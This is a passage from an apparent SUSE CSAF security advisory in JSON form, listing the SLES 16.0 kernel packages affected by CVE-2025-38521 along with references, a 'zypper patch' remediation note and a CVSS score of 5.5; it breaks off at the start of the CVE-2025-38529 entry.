"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38521",
"url": "https://www.suse.com/security/cve/CVE-2025-38521"
},
{
"category": "external",
"summary": "SUSE Bug 1248232 for CVE-2025-38521",
"url": "https://bugzilla.suse.com/1248232"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38521"
},
{
"cve": "CVE-2025-38529",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38529"
}
],
"notes": [
{
"category": "general",
